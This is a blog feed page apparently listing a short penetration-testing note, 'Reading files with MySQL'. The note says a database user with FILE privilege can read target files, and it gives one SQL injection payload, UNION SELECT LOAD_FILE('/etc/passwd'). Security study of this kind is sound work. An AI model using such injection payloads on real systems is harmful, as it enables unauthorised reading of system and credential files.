https://slightlymore.co.uk/tags/union-injection/Recent content in Union-Injection on slightlymoreHugoen-GB<a href="https://creativecommons.org/licenses/by/4.0/" target="_blank" rel="license">CC BY 4.0</a> by Clinton MontagueSat, 03 Jan 2026 21:09:58 +0000https://slightlymore.co.uk/reading-files-with-mysql/Sat, 03 Jan 2026 00:00:00 +0000https://slightlymore.co.uk/reading-files-with-mysql/<p>After <a href="https://slightlymore.co.uk/enumerating-databases-tables-columns-and-user-privileges-with-sql-injection">enumerating user privileges 🌿</a> if you find one which has <code>FILE</code> you can use that to read files from the target.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="s1">&#39;/etc/passwd&#39;</span><span class="p">)</span><span class="w"> </span></span></span></code></pre></div><h2 id="references">References</h2> <ul> <li><a href="https://slightlymore.co.uk/enumerating-databases-tables-columns-and-user-privileges-with-sql-injection">Enumerating databases, tables, columns, and user privileges with SQL injection 🌿</a> </li> <li><a href="https://slightlymore.co.uk/writing-files-with-mysql">Writing files with MySQL 🌱</a> </li> </ul>